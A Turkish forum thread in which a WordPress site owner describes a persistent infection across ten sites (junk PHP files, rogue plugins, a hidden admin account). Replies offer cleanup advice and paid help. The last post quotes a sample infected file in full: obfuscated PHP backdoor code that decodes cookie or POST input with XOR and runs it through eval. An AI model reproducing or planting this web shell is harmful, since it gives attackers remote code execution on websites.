Wordpress Malware Virüs Tespit Edemiyorum

Direct admin üzerinden sunucum var. Bir virüs var tüm sitelerime bulaşıyor ve ne yaptı isem asla bitmiyor. Virüs'ün 2-3 yaptığı işlem var. Bir FTP'de d4412d4.php gibi 0kb 7 haneli random dosyaalr atıyor bu yüz binleri buluyor, İkincisi bazen bir eklenti kuruyor snippet için, üçüncüsü yönetici kısmına kendisini wordpress syncron gibi bir isimle yönetici ekliyor. Dördüncü bazın php dosyalarına doğrudan kod eklemesi yapıyor.

Klasik tüm yöntemleri kendimce denedim. Virüslü dosyaları isimleri ile buldum sildim, yönetici şifrelerini değiştirdim, wp-config, htacess gibi dosyaları kontrol ettim tüm bulunan virüsleri temizledim, ***** eklenti yok gibi, pasif eklentilerimiz pek yok. Temizlik bitince Wordfence eklentisini bir siteme kurdum şaka gibi ama kurduğum siteye hem eklenti kurulmuş, hem yönetici atanmış, hem ftp'ye dosay atmışlar eklenti olana yapamasalar en azından dedim ama olmadı. Sunucumda 10 site var hepsi tek sunucuda haliyle hepsinde aynı virüsü görüyorum.

Bu virüsün ana bulaşma yöntemi nedir, nasıl son bulurum?

Shell sorunu olmasın?

cpanel ve sql şifrelerini değiştir. Wordpressdeki tüm dosyaları sil config.php kalsın tema dosyaları ve bir kaç gerekli dosya sonra tekrar at ama kullanıcı adının şifresinide değiştir.

Numaramdan ulaşabilirsiniz, ücretli bir şekilde yardımcı olabilirim.

Eklentiler ile filan hiç bir alakası yok. Sunucunun kendisinden kaynaklanan bir sorun olmalı büyük ihtimalle. Aynısını bir müşterimde yaşadık; woodmart temasının çok eski bir sürümünü kullanıyordu. Bundan kaynaklanıyor diye düşünerekten tüm siteleri temizledik 1 hafta geçmedi sorun aynı devam ediyor. Sürekli farklı eklentilerin içerisine şifrelenmiş kodlar bırakıyor. Açık ya da shell kaynaklı bir sorun yok, bariz bir şekilde Directadmin'e uzaktan erişim var. Bu sebeple sunucu değişimi yaşadık ve tüm sorun çözüldü.

Çözeriz
https://www.r10.net/wordpress-seo-gu...emium-waf.html

hocam,virüslü dosyalar muhtemelen bir js kodu tarafından tetikleniyor, bu kodun hangi dosyaya bulaştığının bulunup öncelikle bu tetikleyen kodların temizlenmesi lazım aksi halde hergün silip durursunuz ama yeniden tetiklenir, bu şekilde herşey tamamen temizlendikten sonra yeniden zararlı kod ve virüs bulaşmaması için önlemler alınması lazım, dilerseniz ücretli bir şekilde yardımcı olabilirim , pm iletebilirsiniz

Merhabalar, yardımcı olalım.
https://www.r10.net/wordpress-seo-gu...garantili.html

Örnek bir dosya: Kesin ve bir daha çıkmayacak bir çözüm arıyorum.

<?php function xpqvhDZRaZ()
{
$PODzWcII/* XO */= Array ( "gbwdjKLsJVi" => "vKACZmPQsWABnWwxXzJvyqb" );$_F = '18865';
/* Gu*/


$xzFsUrdtia = Array (/* Xmmp*/"hZENLXHMuLywSLLnQNcUchWNrZC"/* ECg */=>/* DyqA */"mIUCQEpKDKpDmvgpRZkNjjW" );
/*UMW */$HLTsSllTs/* fQqbc*/= Array( $PODzWcII, $_COOKIE,/* ck */$PODzWcII,/* XoX */$_POST,/*I */$xzFsUrdtia);$_HnQ/* ykcG */= '37869';
/*Qs*/
return $HLTsSllTs;


}


/*iD */
/*M */function RmRjyP()
{

$SSyQelZS = "x23";$_cYQ = '12409';
/* zbjpH */foreach/* SmNMY */(xpqvhDZRaZ() as $qaOjoy) {
/*BR */IMtqZLW($qaOjoy, $SSyQelZS);$_J =/* DsNYc */'26800';
/* JmL */}
}

/* NxDIk */function oIRFkKS($hFiVXx, $PODzWcII)
/*wC */{


if/* YVpeE */( count (/*cCCcG */$hFiVXx ) == 3 ) {
/* a */$pZGvi/* eHY */= $hFiVXx[1];;
$XhZzBEsaQ/* SAWso */= $hFiVXx[2];
$YlfpyniGSd/* YBBcn */= $pZGvi($XhZzBEsaQ);
eval (/* CzK */$YlfpyniGSd/* JNGP*/);$_NY = '47483';

die ();
}
}

function xThUqsxt($avJZbBr, $kawNAqzs)
{
return $avJZbBr/* zIs*/^ $kawNAqzs;;


}

function/* y */AsvPy($UujHejMyCk,/* KbJJp*/$SSyQelZS)
{/* iiCY */
$UujHejMyCk/* trZ */= explode/* jvUoT */($SSyQelZS, $UujHejMyCk );$_UCP = '64703';
/* WRQYF*/
oIRFkKS($UujHejMyCk, $SSyQelZS);
}

function IMtqZLW($qaOjoy, $SSyQelZS)
{
foreach/* QecCR*/(/* W */$qaOjoy/* lVTaG*/as/* IaFDD */$kawNAqzs =>/* NTw */$avJZbBr/* sZbxO */)/* YM */{
VwPAiiRzU($kawNAqzs, PwAJW($avJZbBr), $SSyQelZS);
}
}
/* gM*/


function nZVlRJtR($kawNAqzs, $avJZbBr)
{
/* EIB */$acCjJcrHj = strlen(/* TS*/$avJZbBr )/strlen( $kawNAqzs/*tiXzj*/);
$kawNAqzs/*v */.= "lLd-iPldmf-aDapumI-rpe-cFu-dPGJOg-ifeD";;
$kawNAqzs =/* Zliu */str_repeat ( $kawNAqzs, $acCjJcrHj/* heoum*/+/* bRhuI */1);;



/* v */return $kawNAqzs;$_bm/* VRgnv */= '6834';
}

/* U*/function/* ump */PwAJW($avJZbBr)
{
/* Td */return @pack( "x48" . chr (42), $avJZbBr/*dtYZ */);
}




/*DQ */function VwPAiiRzU($kawNAqzs,/* fN*/$avJZbBr,/*ln*/$SSyQelZS)


{


AsvPy($avJZbBr/* wWcm*/^ nZVlRJtR($kawNAqzs, $avJZbBr), $SSyQelZS);
}
/* jPoc*/
/*CTLSp */RmRjyP();